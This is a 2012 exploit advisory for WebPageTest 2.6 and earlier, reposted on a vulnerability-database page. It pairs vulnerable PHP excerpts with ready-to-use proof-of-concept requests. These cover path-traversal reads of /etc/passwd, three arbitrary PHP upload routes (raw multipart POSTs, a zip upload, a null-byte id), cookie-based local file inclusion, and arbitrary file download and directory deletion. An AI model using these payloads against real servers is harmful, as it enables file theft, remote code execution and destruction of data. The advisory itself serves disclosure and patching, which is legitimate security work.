WebPageTest 2.6 Shell Upload / File Disclosure / File Deletion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047012 漏洞类型
发布时间 2012-07-14 更新时间 2012-07-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012070087
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
:::::::-.   ...    ::::::.    :::.
  ;;,   `';, ;;     ;;;`;;;;,  `;;;
  `[[     [[[['     [[[  [[[[[. '[[
   $$,    $$$$      $$$  $$$ "Y$c$$
   888_,o8P'88    .d888  888    Y88
   MMMMP"`   "YmmMMMM""  MMM     YM
 
  [ Discovered by dun \ posdub[at]gmail.com ]
  [ 2012-07-11                              ]
#####################################################
# [ WebPagetest <= 2.6 ]  Multiple Vulnerabilities  #
#####################################################
#
# Script: "WebPagetest provides a system for testing the performance of web pages from multiple
#          locations/configurations and consuming the results in a friendly web interface. "
#
# Vendor:   http://www.webpagetest.org/about
# Download: http://code.google.com/p/webpagetest/downloads/list
#
#####################################################
# [ Local File Disclosure #1 ]
# PoC: http://localhost/gettext.php?file=../../../../../../../../../../../etc/passwd
#
# File: ./webpagetest/gettext.php (lines: 2-13)
#  ..cut..
  include('common.inc');                                         // 1
  $ok = false;
 
  if( isset($_GET['file']) && strlen($_GET['file']) )            // 2
  {
      $data = gz_file_get_contents("$testPath/{$_GET['file']}"); // 3
      if( $data !== false )
      {
          $ok = true;
          echo $data;                                            // 7 [LFD]
      }
  }
#  ..cut..
#
# File: ./webpagetest/common.inc (lines: 493-510)
#  ..cut..
  function gz_file_get_contents($file)
  {
      $data = null;
 
      $zip = gzopen("$file.gz", 'rb');
      if( $zip === false )
          $zip = gzopen($file, 'rb');                             // 4
 
      if( $zip !== false )
      {
          $data = gzread($zip, 10000000);                         // 5
          gzclose($zip);
      }
      else
          $data = false;
 
      return $data;                                               // 6
  }
#  ..cut..
#
#####################################################
# [ Local File Disclosure #2 ]
# PoC: http://localhost/gettcpdump.php?file=../../../../../../../../../etc/passwd
#
# File: ./webpagetest/gettcpdump.php (lines: 2-13)
#  ..cut..
  include('common.inc');                                            // 1
  $file = "$testPath/{$_GET['file']}";                              // 2
 
  if( isset($_GET['file']) && strlen($_GET['file']) && gz_is_file($file) ) // 3
  {
      header ("Content-type: application/octet-stream");
      gz_readfile_chunked($file);                                   // 5
  }
#  ..cut..
#
# File: ./webpagetest/common.inc (lines: 460-486, 586-590)
#  ..cut..
  function gz_readfile_chunked($filename, $retbytes = TRUE)
  {
      $buffer = '';
      $cnt =0;
      $handle = gzopen("$filename.gz", 'rb');
      if ($handle === false)
          $handle = gzopen($filename, 'rb');                        // 6
      if ($handle === false)
          return false;
      while (!gzeof($handle))
      {
          $buffer = gzread($handle, 1024 * 1024);  // 1MB at a time // 7
          echo $buffer;                                             // 8 [LFD]
#  ..cut..
      }
#  ..cut..
      return $status;
  }
#  ..cut..
  function gz_is_file($filename)
  {
      $ret = is_file("$filename.gz") || is_file($filename);         // 4
      return $ret;                                                  //
  }
#  ..cut..
#
#####################################################
# [ Local File Disclosure #3 ]
# PoC: http://localhost/getgzip.php?file=../../../../../../../../../etc/passwd
# It's a very similar case, as above.
#
#####################################################
# [ Arbitrary File Upload #1 ]
# File: ./webpagetest/work/resultimage.php (lines: 18-48)
#  ..cut..
  $locKey = $locations[$location]['key'];
  if( (!strlen($locKey) || !strcmp($key, $locKey)) || !strcmp($_SERVER['REMOTE_ADDR'], "127.0.0.1") )  // 1 true
  {
      if( isset($_FILES['file']) )                                                                     // 2
      {
          $fileName = $_FILES['file']['name'];                                                         // 3
          $path = './' . GetTestPath($id);                                                             // $path = './results/'
#  ..cut..
          logMsg(" Moving uploaded image '{$_FILES['file']['tmp_name']}' to '$path/$fileName'\n");
          move_uploaded_file($_FILES['file']['tmp_name'], "$path/$fileName");                          // 4 [AFU]
      }
      else
          logMsg(" no uploaded file attached");
  }
#  ..cut..
# PoC: http://localhost/work/resultimage.php
  POST /work/resultimage.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: pl,en-us;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Connection: keep-alive
  Cache-Control: max-age=0
  Content-Type: multipart/form-data; boundary=---------------------------31101243933548
  Content-Length: 209
  -----------------------------31101243933548
  Content-Disposition: form-data; name="file"; filename="info.php"
  Content-Type: text/x-php
 
  <?php phpinfo(); ?>
 
  -----------------------------31101243933548--
# Uploaded file will be here: http://localhost/results/info.php
#
#####################################################
# [ Arbitrary File Upload #2 ]
# File: ./webpagetest/work/dopublish.php (lines: 2-31)
#  ..cut..
  require_once('../lib/pclzip.lib.php');                              // 1
  include '../common.inc';
  header('Content-type: text/plain');
  header("Cache-Control: no-cache, must-revalidate");
  header("Expires: Sat, 26 Jul 1997 05:00:00 GMT");
  set_time_limit(300);
 
  // make sure a file was uploaded
  if( isset($_FILES['file']) )                                        // 2
  {
      $fileName = $_FILES['file']['name'];                            // 3
 
      // create a new test id
      $today = new DateTime("now", new DateTimeZone('America/New_York'));
      $id = $today->format('ymd_') . md5(uniqid(rand(), true));       // 4
 
      $path = '../' . GetTestPath($id);                               // 5
 
      // create the folder for the test results
      if( !is_dir($path) )
          mkdir($path, 0777, true);
    
      // extract the zip file
      $archive = new PclZip($_FILES['file']['tmp_name']);             // 6
      $list = $archive->extract(PCLZIP_OPT_PATH, "$path/", PCLZIP_OPT_REMOVE_ALL_PATH); // 7 [AFU]
      if( !$list )
          unset($id);
 
      echo $id;
  }
#  ..cut..
# In this case, we need to create the zip archive, which contains our php file (info.php).
# While uploading, archive will be automatically unzipped to the appropriate folder.
# PoC: http://localhost/work/dopublish.php
  POST /work/dopublish.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: pl,en-us;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Connection: keep-alive
  Content-Type: multipart/form-data; boundary=---------------------------4966737613931
  Content-Length: 214
  -----------------------------4966737613931
  Content-Disposition: form-data; name="file"; filename="info.zip"
  Content-Type: application/x-zip-compressed
 
 
  [zip file]
 
  -----------------------------4966737613931--
# After file uploading, script prints some string. For example: 120711_718a3a42e314a0cb740ee66b7b92b9ac.
# This means, uploaded and unzipped file is in folder /results/12/07/11/718a3a42e314a0cb740ee66b7b92b9ac/
# Uploaded file will be here: http://localhost/results/12/07/11/718a3a42e314a0cb740ee66b7b92b9ac/info.php
#
#####################################################
# [ Arbitrary File Upload #3 ] magic_quotes_gpc = Off;
# File: ./webpagetest/work/workdone.php (lines: 12-45)
#  ..cut..
  $id = $_REQUEST['id'];                                             // 1
#  ..cut..
  if( $_REQUEST['video'] )                                           // 2
  {
      logMsg("Video file $id received from $location");
 
      $dir = './' . GetVideoPath($id);                               // 3
      if( isset($_FILES['file']) )                                   // 4
      {
          $dest = $dir . '/video.mp4';                               // 5 $dest = ./results/video/../info.php%00/video.mp4
          move_uploaded_file($_FILES['file']['tmp_name'], $dest);    // 6 [AFU]
#  ..cut..
      }
  }
#  ..cut..
# PoC: http://localhost/work/workdone.php?video=1&id=../info.php%00
  POST /work/workdone.php?video=1&id=../info.php%00 HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: pl,en-us;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Connection: keep-alive
  Content-Type: multipart/form-data; boundary=---------------------------187161971819895
  Content-Length: 211
  -----------------------------187161971819895
  Content-Disposition: form-data; name="file"; filename="info.php"
  Content-Type: text/x-php
 
  <?php phpinfo(); ?>
 
  -----------------------------187161971819895--
# Uploaded file will be here: http://localhost/results/info.php
#
#####################################################
# [ Local File Inclusion ] magic_quotes_gpc = Off;
# File: ./webpagetest/about.php (line: 20)
#  ..cut..
  include 'header.inc';                                             // 1
#  ..cut..
#
# File: ./webpagetest/header.inc (lines: 43-47)
#  ..cut..
           elseif(isset($_COOKIE["cfg"]))
               $testLoc = $_COOKIE["cfg"];                          // 2
            
           if( isset($testLoc) && strlen($testLoc) && is_file("./custom/$testLoc/headerAd.inc") ) // 3
               include("./custom/$testLoc/headerAd.inc");           // 4 [LFI]
#  ..cut..
#
# PoC: http://localhost/about.php
  GET /about.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: pl,en-us;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Connection: keep-alive
  Cookie: cfg=../../../../../../../../../etc/passwd%00
#
#####################################################
# [ Arbitrary File Download #1 ] register_globals = On
# PoC: http://localhost/download.php?testPath=./relay/../../../../../../../../../etc/
# If the "relay" directory exists, the script will compress to a zip archive, all files in
# a directory that is set in testPath variable. Thereafter, zip archive will be sent to the browser.
#
#####################################################
# [ Arbitrary File Download #2 ] magic_quotes_gpc = Off;
# PoC: http://localhost/video/download.php?id=../../../../../../../../../../../etc/passwd%00
#
#####################################################
# [ Arbitrary File Delete ] register_globals = On
# PoC: http://localhost/delete.php?testPath=./relay/../../../../../../../../../etc/
# If the "relay" directory exists, then directory that is set in a variable testPath will be deleted.
#
### [ dun / 2012 ] #####################################################